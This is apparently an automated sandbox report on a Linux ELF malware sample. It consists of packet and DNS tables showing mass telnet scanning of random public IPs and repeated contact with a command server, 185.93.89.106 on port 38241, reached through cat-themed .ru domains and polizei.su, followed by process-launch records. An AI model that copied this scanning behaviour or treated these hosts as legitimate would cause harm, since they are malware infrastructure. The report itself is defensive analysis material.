                                                                                  Feb 10, 2025 20:43:15.829982996 CET3970238241192.168.2.23185.93.89.106
                                                                                  Feb 10, 2025 20:43:15.923341990 CET5572423192.168.2.23176.0.18.55
                                                                                  Feb 10, 2025 20:43:15.923347950 CET4881623192.168.2.23210.41.190.107
                                                                                  Feb 10, 2025 20:43:15.923368931 CET5840623192.168.2.23214.222.106.143
                                                                                  Feb 10, 2025 20:43:15.923376083 CET5604223192.168.2.2326.225.250.89
                                                                                  Feb 10, 2025 20:43:15.923376083 CET4941023192.168.2.23117.200.252.5
                                                                                  Feb 10, 2025 20:43:15.923398018 CET6096023192.168.2.23195.98.250.167
                                                                                  Feb 10, 2025 20:43:15.923398018 CET3649823192.168.2.2345.97.100.58
                                                                                  Feb 10, 2025 20:43:15.923398018 CET3648023192.168.2.2393.40.252.106
                                                                                  Feb 10, 2025 20:43:15.923398018 CET3764023192.168.2.23172.109.115.154
                                                                                  Feb 10, 2025 20:43:15.923408985 CET4853223192.168.2.23183.251.67.12
                                                                                  Feb 10, 2025 20:43:15.923408985 CET4724623192.168.2.2358.88.67.98
                                                                                  Feb 10, 2025 20:43:15.923412085 CET3894623192.168.2.23196.137.119.207
                                                                                  Feb 10, 2025 20:43:15.923410892 CET3987023192.168.2.23152.176.34.128
                                                                                  Feb 10, 2025 20:43:15.923427105 CET4882823192.168.2.23138.58.247.108
                                                                                  Feb 10, 2025 20:43:15.923427105 CET4314623192.168.2.23210.204.139.32
                                                                                  Feb 10, 2025 20:43:15.923441887 CET4110023192.168.2.2398.171.5.218
                                                                                  Feb 10, 2025 20:43:15.923455954 CET3347623192.168.2.2362.184.16.178
                                                                                  Feb 10, 2025 20:43:15.923455954 CET4092823192.168.2.2313.127.161.233
                                                                                  Feb 10, 2025 20:43:15.923459053 CET4302223192.168.2.23132.255.181.26
                                                                                  Feb 10, 2025 20:43:15.923459053 CET5882623192.168.2.2324.142.234.236
                                                                                  Feb 10, 2025 20:43:15.923459053 CET3779223192.168.2.2330.34.11.73
                                                                                  Feb 10, 2025 20:43:15.923474073 CET5843423192.168.2.23144.45.169.118
                                                                                  Feb 10, 2025 20:43:15.923476934 CET4568623192.168.2.2315.235.205.38
                                                                                  Feb 10, 2025 20:43:15.923480988 CET5434223192.168.2.23113.208.61.251
                                                                                  Feb 10, 2025 20:43:15.923485041 CET3572023192.168.2.23185.82.7.101
                                                                                  Feb 10, 2025 20:43:15.923499107 CET4028623192.168.2.2319.193.139.119
                                                                                  Feb 10, 2025 20:43:15.923502922 CET5027623192.168.2.23112.227.42.31
                                                                                  Feb 10, 2025 20:43:15.923506021 CET3937023192.168.2.23193.144.213.93
                                                                                  Feb 10, 2025 20:43:15.923507929 CET4863023192.168.2.2353.90.244.177
                                                                                  Feb 10, 2025 20:43:15.923508883 CET4988423192.168.2.2390.36.37.183
                                                                                  Feb 10, 2025 20:43:15.923516035 CET4378223192.168.2.23156.192.65.183
                                                                                  Feb 10, 2025 20:43:15.923523903 CET5186423192.168.2.2374.243.8.166
                                                                                  Feb 10, 2025 20:43:15.923523903 CET5435823192.168.2.2374.157.102.227
                                                                                  Feb 10, 2025 20:43:15.923527956 CET3406223192.168.2.236.103.233.186
                                                                                  Feb 10, 2025 20:43:15.923527956 CET5669623192.168.2.2323.161.186.251
                                                                                  Feb 10, 2025 20:43:15.923535109 CET4778623192.168.2.23122.48.91.69
                                                                                  Feb 10, 2025 20:43:15.923577070 CET5951023192.168.2.231.55.143.238
                                                                                  Feb 10, 2025 20:43:15.923583984 CET5921223192.168.2.2393.26.209.182
                                                                                  Feb 10, 2025 20:43:16.111360073 CET2355724176.0.18.55192.168.2.23
                                                                                  Feb 10, 2025 20:43:16.111423016 CET2348816210.41.190.107192.168.2.23
                                                                                  Feb 10, 2025 20:43:16.111423016 CET5572423192.168.2.23176.0.18.55
                                                                                  Feb 10, 2025 20:43:16.111433983 CET235604226.225.250.89192.168.2.23
                                                                                  Feb 10, 2025 20:43:16.111443996 CET2349410117.200.252.5192.168.2.23
                                                                                  Feb 10, 2025 20:43:16.111454964 CET2358406214.222.106.143192.168.2.23
                                                                                  Feb 10, 2025 20:43:16.111465931 CET2360960195.98.250.167192.168.2.23
                                                                                  Feb 10, 2025 20:43:16.111480951 CET4881623192.168.2.23210.41.190.107
                                                                                  Feb 10, 2025 20:43:16.111480951 CET5604223192.168.2.2326.225.250.89
                                                                                  Feb 10, 2025 20:43:16.111480951 CET4941023192.168.2.23117.200.252.5
                                                                                  Feb 10, 2025 20:43:16.111505985 CET5840623192.168.2.23214.222.106.143
                                                                                  Feb 10, 2025 20:43:16.111505985 CET6096023192.168.2.23195.98.250.167
                                                                                  Feb 10, 2025 20:43:16.111552954 CET233649845.97.100.58192.168.2.23
                                                                                  Feb 10, 2025 20:43:16.111563921 CET233648093.40.252.106192.168.2.23
                                                                                  Feb 10, 2025 20:43:16.111572981 CET2338946196.137.119.207192.168.2.23
                                                                                  Feb 10, 2025 20:43:16.111588001 CET2337640172.109.115.154192.168.2.23
                                                                                  Feb 10, 2025 20:43:16.111593008 CET3649823192.168.2.2345.97.100.58
                                                                                  Feb 10, 2025 20:43:16.111598015 CET2339870152.176.34.128192.168.2.23
                                                                                  Feb 10, 2025 20:43:16.111607075 CET3894623192.168.2.23196.137.119.207
                                                                                  Feb 10, 2025 20:43:16.111608028 CET2348532183.251.67.12192.168.2.23
                                                                                  Feb 10, 2025 20:43:16.111613035 CET3648023192.168.2.2393.40.252.106
                                                                                  Feb 10, 2025 20:43:16.111618042 CET234724658.88.67.98192.168.2.23
                                                                                  Feb 10, 2025 20:43:16.111628056 CET2348828138.58.247.108192.168.2.23
                                                                                  Feb 10, 2025 20:43:16.111638069 CET2343146210.204.139.32192.168.2.23
                                                                                  Feb 10, 2025 20:43:16.111676931 CET3764023192.168.2.23172.109.115.154
                                                                                  Feb 10, 2025 20:43:16.111680031 CET3987023192.168.2.23152.176.34.128
                                                                                  Feb 10, 2025 20:43:16.111689091 CET4853223192.168.2.23183.251.67.12
                                                                                  Feb 10, 2025 20:43:16.111690044 CET4724623192.168.2.2358.88.67.98
                                                                                  Feb 10, 2025 20:43:16.111694098 CET4882823192.168.2.23138.58.247.108
                                                                                  Feb 10, 2025 20:43:16.111701965 CET4314623192.168.2.23210.204.139.32
                                                                                  Feb 10, 2025 20:43:16.111709118 CET234110098.171.5.218192.168.2.23
                                                                                  Feb 10, 2025 20:43:16.111718893 CET233347662.184.16.178192.168.2.23
                                                                                  Feb 10, 2025 20:43:16.111740112 CET234092813.127.161.233192.168.2.23
                                                                                  Feb 10, 2025 20:43:16.111746073 CET4110023192.168.2.2398.171.5.218
                                                                                  Feb 10, 2025 20:43:16.111749887 CET2343022132.255.181.26192.168.2.23
                                                                                  Feb 10, 2025 20:43:16.111762047 CET235882624.142.234.236192.168.2.23
                                                                                  Feb 10, 2025 20:43:16.111764908 CET3347623192.168.2.2362.184.16.178
                                                                                  Feb 10, 2025 20:43:16.111764908 CET4092823192.168.2.2313.127.161.233
                                                                                  Feb 10, 2025 20:43:16.111771107 CET233779230.34.11.73192.168.2.23
                                                                                  Feb 10, 2025 20:43:16.111774921 CET4302223192.168.2.23132.255.181.26
                                                                                  Feb 10, 2025 20:43:16.111780882 CET2358434144.45.169.118192.168.2.23
                                                                                  Feb 10, 2025 20:43:16.111785889 CET5882623192.168.2.2324.142.234.236
                                                                                  Feb 10, 2025 20:43:16.111795902 CET234568615.235.205.38192.168.2.23
                                                                                  Feb 10, 2025 20:43:16.111810923 CET5843423192.168.2.23144.45.169.118
                                                                                  Feb 10, 2025 20:43:16.111812115 CET3779223192.168.2.2330.34.11.73
                                                                                  Feb 10, 2025 20:43:16.111833096 CET4568623192.168.2.2315.235.205.38
                                                                                  Feb 10, 2025 20:43:16.113166094 CET235921293.26.209.182192.168.2.23
                                                                                  Feb 10, 2025 20:43:16.113183975 CET23595101.55.143.238192.168.2.23
                                                                                  Feb 10, 2025 20:43:16.113193989 CET234988490.36.37.183192.168.2.23
                                                                                  Feb 10, 2025 20:43:16.113204002 CET234863053.90.244.177192.168.2.23
                                                                                  Feb 10, 2025 20:43:16.113213062 CET2347786122.48.91.69192.168.2.23
                                                                                  Feb 10, 2025 20:43:16.113221884 CET235669623.161.186.251192.168.2.23
                                                                                  Feb 10, 2025 20:43:16.113230944 CET23340626.103.233.186192.168.2.23
                                                                                  Feb 10, 2025 20:43:16.113240004 CET235435874.157.102.227192.168.2.23
                                                                                  Feb 10, 2025 20:43:16.113250017 CET235186474.243.8.166192.168.2.23
                                                                                  Feb 10, 2025 20:43:16.113259077 CET2343782156.192.65.183192.168.2.23
                                                                                  Feb 10, 2025 20:43:16.113270998 CET2339370193.144.213.93192.168.2.23
                                                                                  Feb 10, 2025 20:43:16.113285065 CET2350276112.227.42.31192.168.2.23
                                                                                  Feb 10, 2025 20:43:16.113298893 CET234028619.193.139.119192.168.2.23
                                                                                  Feb 10, 2025 20:43:16.113306999 CET2335720185.82.7.101192.168.2.23
                                                                                  Feb 10, 2025 20:43:16.113317966 CET2354342113.208.61.251192.168.2.23
                                                                                  Feb 10, 2025 20:43:16.114139080 CET2354342113.208.61.251192.168.2.23
                                                                                  Feb 10, 2025 20:43:16.114155054 CET2335720185.82.7.101192.168.2.23
                                                                                  Feb 10, 2025 20:43:16.114164114 CET234028619.193.139.119192.168.2.23
                                                                                  Feb 10, 2025 20:43:16.114183903 CET2350276112.227.42.31192.168.2.23
                                                                                  Feb 10, 2025 20:43:16.114193916 CET5434223192.168.2.23113.208.61.251
                                                                                  Feb 10, 2025 20:43:16.114203930 CET2339370193.144.213.93192.168.2.23
                                                                                  Feb 10, 2025 20:43:16.114218950 CET2343782156.192.65.183192.168.2.23
                                                                                  Feb 10, 2025 20:43:16.114223003 CET5027623192.168.2.23112.227.42.31
                                                                                  Feb 10, 2025 20:43:16.114228010 CET4028623192.168.2.2319.193.139.119
                                                                                  Feb 10, 2025 20:43:16.114228964 CET235186474.243.8.166192.168.2.23
                                                                                  Feb 10, 2025 20:43:16.114231110 CET3572023192.168.2.23185.82.7.101
                                                                                  Feb 10, 2025 20:43:16.114231110 CET3937023192.168.2.23193.144.213.93
                                                                                  Feb 10, 2025 20:43:16.114238024 CET235435874.157.102.227192.168.2.23
                                                                                  Feb 10, 2025 20:43:16.114248037 CET23340626.103.233.186192.168.2.23
                                                                                  Feb 10, 2025 20:43:16.114254951 CET4378223192.168.2.23156.192.65.183
                                                                                  Feb 10, 2025 20:43:16.114264011 CET235669623.161.186.251192.168.2.23
                                                                                  Feb 10, 2025 20:43:16.114273071 CET2347786122.48.91.69192.168.2.23
                                                                                  Feb 10, 2025 20:43:16.114283085 CET234863053.90.244.177192.168.2.23
                                                                                  Feb 10, 2025 20:43:16.114283085 CET3406223192.168.2.236.103.233.186
                                                                                  Feb 10, 2025 20:43:16.114290953 CET234988490.36.37.183192.168.2.23
                                                                                  Feb 10, 2025 20:43:16.114296913 CET5669623192.168.2.2323.161.186.251
                                                                                  Feb 10, 2025 20:43:16.114299059 CET4778623192.168.2.23122.48.91.69
                                                                                  Feb 10, 2025 20:43:16.114300966 CET23595101.55.143.238192.168.2.23
                                                                                  Feb 10, 2025 20:43:16.114310980 CET235921293.26.209.182192.168.2.23
                                                                                  Feb 10, 2025 20:43:16.114310980 CET4863023192.168.2.2353.90.244.177
                                                                                  Feb 10, 2025 20:43:16.114322901 CET5186423192.168.2.2374.243.8.166
                                                                                  Feb 10, 2025 20:43:16.114322901 CET5435823192.168.2.2374.157.102.227
                                                                                  Feb 10, 2025 20:43:16.114336967 CET4988423192.168.2.2390.36.37.183
                                                                                  Feb 10, 2025 20:43:16.114345074 CET5951023192.168.2.231.55.143.238
                                                                                  Feb 10, 2025 20:43:16.114362001 CET5921223192.168.2.2393.26.209.182
                                                                                  Feb 10, 2025 20:43:16.201849937 CET43928443192.168.2.2391.189.91.42
                                                                                  Feb 10, 2025 20:43:16.861248016 CET3977438241192.168.2.23185.93.89.106
                                                                                  Feb 10, 2025 20:43:16.866060972 CET3824139774185.93.89.106192.168.2.23
                                                                                  Feb 10, 2025 20:43:16.866110086 CET3977438241192.168.2.23185.93.89.106
                                                                                  Feb 10, 2025 20:43:16.867268085 CET3977438241192.168.2.23185.93.89.106
                                                                                  Feb 10, 2025 20:43:16.872088909 CET3824139774185.93.89.106192.168.2.23
                                                                                  Feb 10, 2025 20:43:16.872128963 CET3977438241192.168.2.23185.93.89.106
                                                                                  Feb 10, 2025 20:43:16.876933098 CET3824139774185.93.89.106192.168.2.23
                                                                                  Feb 10, 2025 20:43:17.489912033 CET3824139774185.93.89.106192.168.2.23
                                                                                  Feb 10, 2025 20:43:17.489974022 CET3977438241192.168.2.23185.93.89.106
                                                                                  Feb 10, 2025 20:43:17.490025997 CET3977438241192.168.2.23185.93.89.106
                                                                                  Feb 10, 2025 20:43:18.499890089 CET3977638241192.168.2.23185.93.89.106
                                                                                  Feb 10, 2025 20:43:18.504776955 CET3824139776185.93.89.106192.168.2.23
                                                                                  Feb 10, 2025 20:43:18.504858017 CET3977638241192.168.2.23185.93.89.106
                                                                                  Feb 10, 2025 20:43:18.505783081 CET3977638241192.168.2.23185.93.89.106
                                                                                  Feb 10, 2025 20:43:18.510512114 CET3824139776185.93.89.106192.168.2.23
                                                                                  Feb 10, 2025 20:43:18.510561943 CET3977638241192.168.2.23185.93.89.106
                                                                                  Feb 10, 2025 20:43:18.515275002 CET3824139776185.93.89.106192.168.2.23
                                                                                  Feb 10, 2025 20:43:19.131169081 CET3824139776185.93.89.106192.168.2.23
                                                                                  Feb 10, 2025 20:43:19.131230116 CET3977638241192.168.2.23185.93.89.106
                                                                                  Feb 10, 2025 20:43:19.131285906 CET3977638241192.168.2.23185.93.89.106
                                                                                  Feb 10, 2025 20:43:20.144783020 CET3977838241192.168.2.23185.93.89.106
                                                                                  Feb 10, 2025 20:43:20.149619102 CET3824139778185.93.89.106192.168.2.23
                                                                                  Feb 10, 2025 20:43:20.149678946 CET3977838241192.168.2.23185.93.89.106
                                                                                  Feb 10, 2025 20:43:20.150942087 CET3977838241192.168.2.23185.93.89.106
                                                                                  Feb 10, 2025 20:43:20.155740023 CET3824139778185.93.89.106192.168.2.23
                                                                                  Feb 10, 2025 20:43:20.155785084 CET3977838241192.168.2.23185.93.89.106
                                                                                  Feb 10, 2025 20:43:20.160587072 CET3824139778185.93.89.106192.168.2.23
                                                                                  Feb 10, 2025 20:43:20.754501104 CET3824139778185.93.89.106192.168.2.23
                                                                                  Feb 10, 2025 20:43:20.754637003 CET3977838241192.168.2.23185.93.89.106
                                                                                  Feb 10, 2025 20:43:20.754637003 CET3977838241192.168.2.23185.93.89.106
                                                                                  Feb 10, 2025 20:43:21.577033997 CET42836443192.168.2.2391.189.91.43
                                                                                  Feb 10, 2025 20:43:21.776861906 CET3978038241192.168.2.23185.93.89.106
                                                                                  Feb 10, 2025 20:43:21.781727076 CET3824139780185.93.89.106192.168.2.23
                                                                                  Feb 10, 2025 20:43:21.781843901 CET3978038241192.168.2.23185.93.89.106
                                                                                  Feb 10, 2025 20:43:21.795242071 CET3978038241192.168.2.23185.93.89.106
                                                                                  Feb 10, 2025 20:43:21.800206900 CET3824139780185.93.89.106192.168.2.23
                                                                                  Feb 10, 2025 20:43:21.800662994 CET3978038241192.168.2.23185.93.89.106
                                                                                  Feb 10, 2025 20:43:21.805455923 CET3824139780185.93.89.106192.168.2.23
                                                                                  Feb 10, 2025 20:43:22.410501957 CET3824139780185.93.89.106192.168.2.23
                                                                                  Feb 10, 2025 20:43:22.410809994 CET3978038241192.168.2.23185.93.89.106
                                                                                  Feb 10, 2025 20:43:22.410809994 CET3978038241192.168.2.23185.93.89.106
                                                                                  Feb 10, 2025 20:43:23.112754107 CET4251680192.168.2.23109.202.202.202
                                                                                  Feb 10, 2025 20:43:23.419547081 CET3978238241192.168.2.23185.93.89.106
                                                                                  Feb 10, 2025 20:43:23.424415112 CET3824139782185.93.89.106192.168.2.23
                                                                                  Feb 10, 2025 20:43:23.424577951 CET3978238241192.168.2.23185.93.89.106
                                                                                  Feb 10, 2025 20:43:23.425091028 CET3978238241192.168.2.23185.93.89.106
                                                                                  Feb 10, 2025 20:43:23.429922104 CET3824139782185.93.89.106192.168.2.23
                                                                                  Feb 10, 2025 20:43:23.430951118 CET3978238241192.168.2.23185.93.89.106
                                                                                  Feb 10, 2025 20:43:23.435794115 CET3824139782185.93.89.106192.168.2.23
                                                                                  Feb 10, 2025 20:43:24.035805941 CET3824139782185.93.89.106192.168.2.23
                                                                                  Feb 10, 2025 20:43:24.035907984 CET3978238241192.168.2.23185.93.89.106
                                                                                  Feb 10, 2025 20:43:24.035907984 CET3978238241192.168.2.23185.93.89.106
                                                                                  Feb 10, 2025 20:43:25.045166969 CET3978438241192.168.2.23185.93.89.106
                                                                                  Feb 10, 2025 20:43:25.050889969 CET3824139784185.93.89.106192.168.2.23
                                                                                  Feb 10, 2025 20:43:25.051012993 CET3978438241192.168.2.23185.93.89.106
                                                                                  Feb 10, 2025 20:43:25.051500082 CET3978438241192.168.2.23185.93.89.106
                                                                                  Feb 10, 2025 20:43:25.056288958 CET3824139784185.93.89.106192.168.2.23
                                                                                  Feb 10, 2025 20:43:25.056364059 CET3978438241192.168.2.23185.93.89.106
                                                                                  Feb 10, 2025 20:43:25.061158895 CET3824139784185.93.89.106192.168.2.23
                                                                                  Feb 10, 2025 20:43:25.677135944 CET3824139784185.93.89.106192.168.2.23
                                                                                  Feb 10, 2025 20:43:25.677223921 CET3978438241192.168.2.23185.93.89.106
                                                                                  Feb 10, 2025 20:43:25.677251101 CET3978438241192.168.2.23185.93.89.106
                                                                                  Feb 10, 2025 20:43:26.685659885 CET3978638241192.168.2.23185.93.89.106
                                                                                  Feb 10, 2025 20:43:26.690545082 CET3824139786185.93.89.106192.168.2.23
                                                                                  Feb 10, 2025 20:43:26.690617085 CET3978638241192.168.2.23185.93.89.106
                                                                                  Feb 10, 2025 20:43:26.691160917 CET3978638241192.168.2.23185.93.89.106
                                                                                  Feb 10, 2025 20:43:26.695965052 CET3824139786185.93.89.106192.168.2.23
                                                                                  Feb 10, 2025 20:43:26.696013927 CET3978638241192.168.2.23185.93.89.106
                                                                                  Feb 10, 2025 20:43:26.700803041 CET3824139786185.93.89.106192.168.2.23
                                                                                  Feb 10, 2025 20:43:27.307754993 CET3824139786185.93.89.106192.168.2.23
                                                                                  Feb 10, 2025 20:43:27.307881117 CET3978638241192.168.2.23185.93.89.106
                                                                                  Feb 10, 2025 20:43:27.307919025 CET3978638241192.168.2.23185.93.89.106
                                                                                  Feb 10, 2025 20:43:28.316278934 CET3978838241192.168.2.23185.93.89.106
                                                                                  Feb 10, 2025 20:43:28.321126938 CET3824139788185.93.89.106192.168.2.23
                                                                                  Feb 10, 2025 20:43:28.321208000 CET3978838241192.168.2.23185.93.89.106
                                                                                  Feb 10, 2025 20:43:28.321851015 CET3978838241192.168.2.23185.93.89.106
                                                                                  Feb 10, 2025 20:43:28.326662064 CET3824139788185.93.89.106192.168.2.23
                                                                                  Feb 10, 2025 20:43:28.326706886 CET3978838241192.168.2.23185.93.89.106
                                                                                  Feb 10, 2025 20:43:28.331505060 CET3824139788185.93.89.106192.168.2.23
                                                                                  Feb 10, 2025 20:43:28.971606970 CET3824139788185.93.89.106192.168.2.23
                                                                                  Feb 10, 2025 20:43:28.971693993 CET3978838241192.168.2.23185.93.89.106
                                                                                  Feb 10, 2025 20:43:28.971743107 CET3978838241192.168.2.23185.93.89.106
                                                                                  Feb 10, 2025 20:43:29.992036104 CET3979038241192.168.2.23185.93.89.106
                                                                                  Feb 10, 2025 20:43:29.996841908 CET3824139790185.93.89.106192.168.2.23
                                                                                  Feb 10, 2025 20:43:29.996903896 CET3979038241192.168.2.23185.93.89.106
                                                                                  Feb 10, 2025 20:43:29.997579098 CET3979038241192.168.2.23185.93.89.106
                                                                                  Feb 10, 2025 20:43:30.002356052 CET3824139790185.93.89.106192.168.2.23
                                                                                  Feb 10, 2025 20:43:30.002403021 CET3979038241192.168.2.23185.93.89.106
                                                                                  Feb 10, 2025 20:43:30.007208109 CET3824139790185.93.89.106192.168.2.23
                                                                                  Feb 10, 2025 20:43:30.627753973 CET3824139790185.93.89.106192.168.2.23
                                                                                  Feb 10, 2025 20:43:30.627823114 CET3979038241192.168.2.23185.93.89.106
                                                                                  Feb 10, 2025 20:43:30.627861977 CET3979038241192.168.2.23185.93.89.106
                                                                                  Feb 10, 2025 20:43:31.636101007 CET3979238241192.168.2.23185.93.89.106
                                                                                  Feb 10, 2025 20:43:31.641326904 CET3824139792185.93.89.106192.168.2.23
                                                                                  Feb 10, 2025 20:43:31.641432047 CET3979238241192.168.2.23185.93.89.106
                                                                                  Feb 10, 2025 20:43:31.642023087 CET3979238241192.168.2.23185.93.89.106
                                                                                  Feb 10, 2025 20:43:31.647057056 CET3824139792185.93.89.106192.168.2.23
                                                                                  Feb 10, 2025 20:43:31.647115946 CET3979238241192.168.2.23185.93.89.106
                                                                                  Feb 10, 2025 20:43:31.652020931 CET3824139792185.93.89.106192.168.2.23
                                                                                  Feb 10, 2025 20:43:37.190788984 CET43928443192.168.2.2391.189.91.42
                                                                                  Feb 10, 2025 20:43:41.650306940 CET3979238241192.168.2.23185.93.89.106
                                                                                  Feb 10, 2025 20:43:41.655097008 CET3824139792185.93.89.106192.168.2.23
                                                                                  Feb 10, 2025 20:43:41.823599100 CET3824139792185.93.89.106192.168.2.23
                                                                                  Feb 10, 2025 20:43:41.823647022 CET3979238241192.168.2.23185.93.89.106
                                                                                  Feb 10, 2025 20:43:47.429560900 CET42836443192.168.2.2391.189.91.43
                                                                                  Feb 10, 2025 20:43:53.572664022 CET4251680192.168.2.23109.202.202.202
                                                                                  Feb 10, 2025 20:44:18.145277977 CET43928443192.168.2.2391.189.91.42
                                                                                  Feb 10, 2025 20:44:38.622309923 CET42836443192.168.2.2391.189.91.43
                                                                                  Feb 10, 2025 20:44:41.861984015 CET3979238241192.168.2.23185.93.89.106
                                                                                  Feb 10, 2025 20:44:41.866787910 CET3824139792185.93.89.106192.168.2.23
                                                                                  Feb 10, 2025 20:44:42.038646936 CET3824139792185.93.89.106192.168.2.23
                                                                                  Feb 10, 2025 20:44:42.038758993 CET3979238241192.168.2.23185.93.89.106
                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Feb 10, 2025 20:43:15.160614967 CET4355153192.168.2.238.8.8.8
                                                                                  Feb 10, 2025 20:43:15.171273947 CET53435518.8.8.8192.168.2.23
                                                                                  Feb 10, 2025 20:43:16.842824936 CET3363553192.168.2.238.8.8.8
                                                                                  Feb 10, 2025 20:43:16.860775948 CET53336358.8.8.8192.168.2.23
                                                                                  Feb 10, 2025 20:43:18.492769003 CET4172753192.168.2.238.8.8.8
                                                                                  Feb 10, 2025 20:43:18.499190092 CET53417278.8.8.8192.168.2.23
                                                                                  Feb 10, 2025 20:43:20.134335995 CET5289753192.168.2.238.8.8.8
                                                                                  Feb 10, 2025 20:43:20.144220114 CET53528978.8.8.8192.168.2.23
                                                                                  Feb 10, 2025 20:43:21.769293070 CET3697953192.168.2.238.8.8.8
                                                                                  Feb 10, 2025 20:43:21.775608063 CET53369798.8.8.8192.168.2.23
                                                                                  Feb 10, 2025 20:43:23.413122892 CET3975353192.168.2.238.8.8.8
                                                                                  Feb 10, 2025 20:43:23.419194937 CET53397538.8.8.8192.168.2.23
                                                                                  Feb 10, 2025 20:43:25.036879063 CET3599353192.168.2.238.8.8.8
                                                                                  Feb 10, 2025 20:43:25.044719934 CET53359938.8.8.8192.168.2.23
                                                                                  Feb 10, 2025 20:43:26.678462029 CET3449153192.168.2.238.8.8.8
                                                                                  Feb 10, 2025 20:43:26.685249090 CET53344918.8.8.8192.168.2.23
                                                                                  Feb 10, 2025 20:43:28.309293032 CET4347853192.168.2.238.8.8.8
                                                                                  Feb 10, 2025 20:43:28.315713882 CET53434788.8.8.8192.168.2.23
                                                                                  Feb 10, 2025 20:43:29.973150969 CET5107953192.168.2.238.8.8.8
                                                                                  Feb 10, 2025 20:43:29.991486073 CET53510798.8.8.8192.168.2.23
                                                                                  Feb 10, 2025 20:43:31.629143000 CET4665553192.168.2.238.8.8.8
                                                                                  Feb 10, 2025 20:43:31.635322094 CET53466558.8.8.8192.168.2.23
                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                  Feb 10, 2025 20:43:15.160614967 CET192.168.2.238.8.8.80x4e44Standard query (0)polizei.suA (IP address)IN (0x0001)false
                                                                                  Feb 10, 2025 20:43:16.842824936 CET192.168.2.238.8.8.80xab16Standard query (0)cuttiecats.ruA (IP address)IN (0x0001)false
                                                                                  Feb 10, 2025 20:43:18.492769003 CET192.168.2.238.8.8.80xfd8cStandard query (0)kittler.ru. [malformed]256470false
                                                                                  Feb 10, 2025 20:43:20.134335995 CET192.168.2.238.8.8.80xaabeStandard query (0)mykittler.ruA (IP address)IN (0x0001)false
                                                                                  Feb 10, 2025 20:43:21.769293070 CET192.168.2.238.8.8.80x315dStandard query (0)cats-master.ru. [malformed]256473false
                                                                                  Feb 10, 2025 20:43:23.413122892 CET192.168.2.238.8.8.80xdeffStandard query (0)gokittler.ru. [malformed]256475false
                                                                                  Feb 10, 2025 20:43:25.036879063 CET192.168.2.238.8.8.80x1b07Standard query (0)polizei.su. [malformed]256477false
                                                                                  Feb 10, 2025 20:43:26.678462029 CET192.168.2.238.8.8.80xa5c0Standard query (0)qittler.ru. [malformed]256478false
                                                                                  Feb 10, 2025 20:43:28.309293032 CET192.168.2.238.8.8.80x3b90Standard query (0)newkittler.ru. [malformed]256480false
                                                                                  Feb 10, 2025 20:43:29.973150969 CET192.168.2.238.8.8.80x9c8dStandard query (0)cats-master.ruA (IP address)IN (0x0001)false
                                                                                  Feb 10, 2025 20:43:31.629143000 CET192.168.2.238.8.8.80x7f55Standard query (0)thekittler.ru. [malformed]256483false
                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                  Feb 10, 2025 20:43:15.171273947 CET8.8.8.8192.168.2.230x4e44No error (0)polizei.su185.93.89.106A (IP address)IN (0x0001)false
                                                                                  Feb 10, 2025 20:43:16.860775948 CET8.8.8.8192.168.2.230xab16No error (0)cuttiecats.ru185.93.89.106A (IP address)IN (0x0001)false
                                                                                  Feb 10, 2025 20:43:20.144220114 CET8.8.8.8192.168.2.230xaabeNo error (0)mykittler.ru185.93.89.106A (IP address)IN (0x0001)false
                                                                                  Feb 10, 2025 20:43:29.991486073 CET8.8.8.8192.168.2.230x9c8dNo error (0)cats-master.ru185.93.89.106A (IP address)IN (0x0001)false

                                                                                  System Behavior

                                                                                  Start time (UTC):19:43:12
                                                                                  Start date (UTC):10/02/2025
                                                                                  Path:/tmp/rep.m68k.elf
                                                                                  Arguments:/tmp/rep.m68k.elf
                                                                                  File size:4463432 bytes
                                                                                  MD5 hash:cd177594338c77b895ae27c33f8f86cc

                                                                                  Start time (UTC):19:43:13
                                                                                  Start date (UTC):10/02/2025
                                                                                  Path:/tmp/rep.m68k.elf
                                                                                  Arguments:-
                                                                                  File size:4463432 bytes
                                                                                  MD5 hash:cd177594338c77b895ae27c33f8f86cc

                                                                                  Start time (UTC):19:43:13
                                                                                  Start date (UTC):10/02/2025
                                                                                  Path:/tmp/rep.m68k.elf
                                                                                  Arguments:-
                                                                                  File size:4463432 bytes
                                                                                  MD5 hash:cd177594338c77b895ae27c33f8f86cc

                                                                                  Start time (UTC):19:43:14
                                                                                  Start date (UTC):10/02/2025
                                                                                  Path:/tmp/rep.m68k.elf
                                                                                  Arguments:-
                                                                                  File size:4463432 bytes
                                                                                  MD5 hash:cd177594338c77b895ae27c33f8f86cc

                                                                                  Start time (UTC):19:43:14
                                                                                  Start date (UTC):10/02/2025
                                                                                  Path:/tmp/rep.m68k.elf
                                                                                  Arguments:-
                                                                                  File size:4463432 bytes
                                                                                  MD5 hash:cd177594338c77b895ae27c33f8f86cc

                                                                                  Start time (UTC):19:43:14
                                                                                  Start date (UTC):10/02/2025
                                                                                  Path:/usr/libexec/gnome-session-binary
                                                                                  Arguments:-
                                                                                  File size:334664 bytes
                                                                                  MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                                                                  Start time (UTC):19:43:14
                                                                                  Start date (UTC):10/02/2025
                                                                                  Path:/bin/sh
                                                                                  Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-wacom
                                                                                  File size:129816 bytes
                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                  Start time (UTC):19:43:14
                                                                                  Start date (UTC):10/02/2025
                                                                                  Path:/usr/sbin/gdm3
                                                                                  Arguments:-
                                                                                  File size:453296 bytes
                                                                                  MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                                                                                  Start time (UTC):19:43:14
                                                                                  Start date (UTC):10/02/2025
                                                                                  Path:/etc/gdm3/PrimeOff/Default
                                                                                  Arguments:/etc/gdm3/PrimeOff/Default
                                                                                  File size:129816 bytes
                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                  Start time (UTC):19:43:14
                                                                                  Start date (UTC):10/02/2025
                                                                                  Path:/usr/bin/xfce4-session
                                                                                  Arguments:-
                                                                                  File size:264752 bytes
                                                                                  MD5 hash:648919f03ad356720c8c27f5aaaf75d1

                                                                                  Start time (UTC):19:43:14
                                                                                  Start date (UTC):10/02/2025
                                                                                  Path:/usr/sbin/gdm3
                                                                                  Arguments:-
                                                                                  File size:453296 bytes
